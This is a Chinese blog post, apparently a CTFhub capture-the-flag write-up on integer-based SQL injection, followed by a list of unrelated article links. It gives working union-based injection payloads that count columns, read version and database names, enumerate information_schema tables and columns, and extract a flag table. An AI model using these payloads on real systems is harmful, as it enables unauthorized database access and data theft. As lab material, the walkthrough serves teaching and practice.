CTFhub-sql-整数注入

news2024/9/19 11:02:05

判断存在 sqli 注入

1 and 1=1

 1 and 1=2

因为 1=1 为真，1=2 为假，且 1=1 与 1 显示的数据一样，那么就存在 sqli 注入

查询该数据表的字段数量

一、

1,2成功带出数据，3没有数据，所以有两个字段

二、

1 order by 2

1 order by 3

1 order by 2 与 1 显示的一样，1 order by 3 没有数据,所以，字段数为 2

修改参数 ID 值

1 union select 1,2

由于 1 union select 1,2 只返回第一条结果，union select 的结果没有输出，所以需要修改参数 id

值，可以 -1 ,0 随便哪个都可以

 520 union select 1,2

520 union select 1,version()

520 union select 1,database()  #查询当前数据库信息

查询所有的数据库库名（schemata 表储存用户创建的所有数据库的库名，schema_name 数据库库名）

520 union select 1,group_concat(schema_name)

from information_schema.schemata

查询 sqli 数据库下的数据表（tables 表储存用户创建的所有数据库的库名和表名，table_name数据库的表名）

520 union select 1,group_concat(table_name)

from information_schema.tables

where table_schema='sqli'

查询sqli 数据库下，flag 表中的字段名

（columns 表存储用户创建的所有数据库的库名table_schema、表名table_name、字段名column_name）

0 union select 1,group_concat(column_name)

from information_schema.columns

where table_schema='sqli' and table_name='flag'

查询 sqli 数据库中.flag字段名下的字段内容

520 union select 1,group_concat(flag)

from sqli.flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/910080.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

数据结构---串（赋值，求子串，比较，定位）

数据结构---串（赋值，求子串，比较，定位）

目录一.初始化顺序表中串的存储串的链式存储二.赋值操作：将str赋值给S 链式表顺序表三.复制操作：将chars复制到str中链式表顺序表四.判空操作链式表顺序表五.清空操作六.串联结链式表顺序表七.求子串链式表顺序表…

阅读更多...

Vue 2.x 项目升级到 Vue 3详细指南【修改清单】

Vue 2.x 项目升级到 Vue 3详细指南【修改清单】

文章目录前言0.迁移过程1. 安装 Vue 32. 逐一处理迁移中的警告3. 迁移全局和内部 API4. 迁移 Vue Router 和 Vuex5. 处理其他的不兼容变更 1. Vue3特性1. Composition API2. 更好的性能3. 更好的 TypeScript 支持4. 多个根元素5. Suspense 组件6. Teleport 组件7. 全局 API 的…

阅读更多...

python 打印人口分布金字塔图

python 打印人口分布金字塔图

背景今天介绍一个不使用 matplot，通过DebugInfo模块打印人口金字塔图的方法。引入模块 pip install DebugInfo打印人口金字塔图下面的代码构建了两个人口数据（仅做功能演示，不承诺任何参考价值），男性人口和女性…

阅读更多...

基础论文学习（4）——CLIP

基础论文学习（4）——CLIP

《Learning Transferable Visual Models From Natural Language Supervision》 CLIP的英文全称是Contrastive Language-Image Pre-training，即一种基于对比文本-图像对的预训练模型。CLIP是一种基于对比学习的多模态模型，与CV中的一些对比学习方法如moc…

阅读更多...

软考高级架构师下篇-12层次式架构设计理论与实践

软考高级架构师下篇-12层次式架构设计理论与实践

目录 1. 考情分析2. 层次式体系结构概述3. 表现层框架设计4. 中间层框架设计5. 数据访问层设计6. 数据架构规划与设计7. 物联网层次架构设计7. 前文回顾1. 考情分析根据考试大纲，层次式架构设计理论与实践知识点会涉及单选题型(约占2~5分)和案例题(25分),本小时内容偏重于方…

阅读更多...

lesson9: C++多线程

lesson9: C++多线程

1.线程库 1.1 thread类的简单介绍 C11 中引入了对线程的支持了，使得 C 在并行编程时不需要依赖第三方库而且在原子操作中还引入了原子类的概念。要使用标准库中的线程，必须包含 < thread > 头文件函数名功能 thread() 构造一个线程对象…

阅读更多...

LCD液晶屏接口静电浪涌保护用TVS/ESD二极管，如何选型？

LCD液晶屏接口静电浪涌保护用TVS/ESD二极管，如何选型？

LCD 液晶屏是Liquid Crystal Display 的简称，指将玻璃和LCD驱动器集成到一起的LCD显示产品，为用户提供了一个标准的LCD显示驱动接口，用户可以按照接口（有4位、8位、VGA等不同类型）要求进行操作来控制LCD正确显示。众所…

阅读更多...

Fsm onehot

Fsm onehot

module top_module(input in,input [9:0] state,output [9:0] next_state,output out1,output out2);assign out1(state[8]|state[9])?1:0;assign out2(state[9]|state[7])?1:0;assign next_state[0](state[0]&(~in)) |(state[1]&(~in)) |(state[2]&(~in)) |(sta…

阅读更多...

LVS+Keepalived 实验

LVS+Keepalived 实验

Keepalived 是什么 Keepalived 是一个基于VRRP协议来实现的LVS服务高可用方案，可以解决静态路由出现的单点故障问题的一款检查工具在一个LVS服务集群中通常有主服务器（MASTER）和备份服务器（BACKUP）两种角色的服务器…

阅读更多...

ShardingSphere01-docker环境安装

ShardingSphere01-docker环境安装

使用docker安装数据库是一个非常好的选择，后续的读写分离、数据分片等功能的数据库都是由docker创建。一、安装准备 1、前提条件 Docker可以运行在Windows、Mac、CentOS、Ubuntu等操作系统上 Docker支持以下的CentOS版本： CentOS 7 (64-bit)CentOS …

阅读更多...

LLM预训练大型语言模型Pre-training large language models

LLM预训练大型语言模型Pre-training large language models

在上一个视频中，您被介绍到了生成性AI项目的生命周期。如您所见，在您开始启动您的生成性AI应用的有趣部分之前，有几个步骤需要完成。一旦您确定了您的用例范围，并确定了您需要LLM在您的应用程序中的工作方式，您的下…

阅读更多...

第59步深度学习图像识别：误判病例分析（TensorFlow）

第59步深度学习图像识别：误判病例分析（TensorFlow）

基于WIN10的64位系统演示一、写在前面本期内容对等于机器学习二分类系列的误判病例分析（传送门）。既然前面的数据可以这么分析，那么图形识别自然也可以。本期以mobilenet_v2模型为例，因为它建模速度快。同样，基…

阅读更多...

Linux下Jenkins安装（最新）

Linux下Jenkins安装（最新）

环境概述随着软件开发需求及复杂度的不断提高，团队开发成员之间如何更好地协同工作以确保软件开发的质量已经慢慢成为开发过程中不可回避的问题。Jenkins自动化部署可以解决集成、测试、部署等重复性的工作，工具集成的效率明显高于人工操作&#xff1b…

阅读更多...

Android动画进阶指北

Android动画进阶指北

原文链接 Android Animation Advanced Tricks 前面的文章介绍了动画的基本使用方法，本文来聊一聊涉及到动画的高级技巧，以及一些非常优质的学习资源和动画三方库和框架。页面之间的过渡动画常规的动画都是针对某一页面上的某个元素做动画&#xff0c…

阅读更多...

3、Spring_容器执行

3、Spring_容器执行

容器执行点 1.整合 druid 连接池添加依赖 <dependency><groupId>com.alibaba</groupId><artifactId>druid</artifactId><version>1.2.8</version> </dependency>1.硬编码方式整合新建德鲁伊配置 <?xml version"1.…

阅读更多...

微信小程序车牌号输入组件

微信小程序车牌号输入组件

概述一个小组件，用于方便用户输入车牌号码详细概述有时候我们开发过程中会遇到需要用户输入车牌号的情况，让客户通过自带键盘输入，体验不好且容易出错，例如车牌号是不能输入O和I的，因此需要有一个自定义的键盘…

阅读更多...

FPGA中锁存器（latch）、触发器（flip-flop）以及寄存器（register）详解

FPGA中锁存器（latch）、触发器（flip-flop）以及寄存器（register）详解

文章目录 1 定义1.1 锁存器（latch）1.2 触发器（flip-flop）1.3 寄存器（register） 2 比较2.1 锁存器（Latch）危害即产生原因2.2 寄存器和锁存器的区别2.3 锁存器和触发器的区别 3 结构3.…

阅读更多...

dvwa环境搭建

dvwa环境搭建

靶场搭建环境作用apache网站代理，部署网站php一种开源通用脚本语言，用来处理程序mysql数据库，用来存储数据 1.打开sever 2008，远程桌面连接，将文件拷贝到虚拟机，打开微软常用集合运行库，等待…

阅读更多...

「Vue｜网页开发｜前端开发」01 快速入门：用vue-cli快速写一个Vue的HelloWorld项目

「Vue｜网页开发｜前端开发」01 快速入门：用vue-cli快速写一个Vue的HelloWorld项目

本文主要介绍如何用vue开发的标准化工具vue-cli快速搭建一个符合实际业务项目结构的hello world网页项目并理解vue的代码文件结构以及页面渲染流程。文章目录一、准备工作：安装node.js二、项目搭建创建项目目录全局安装vue-cli使用Webpack初始化项目启动项目学会…

阅读更多...

RedisDesktopManager 连接redis

RedisDesktopManager 连接redis

redis查看是否启动成功 ps -ef | grep redis以上未启动成功 cd /usr/local/bin/ 切换根目录 sudo -i 开启服务端 ./redis-server /usr/local/redis/redis.conf 开启客户端 ./redis-cli

阅读更多...

推荐文章

最新文章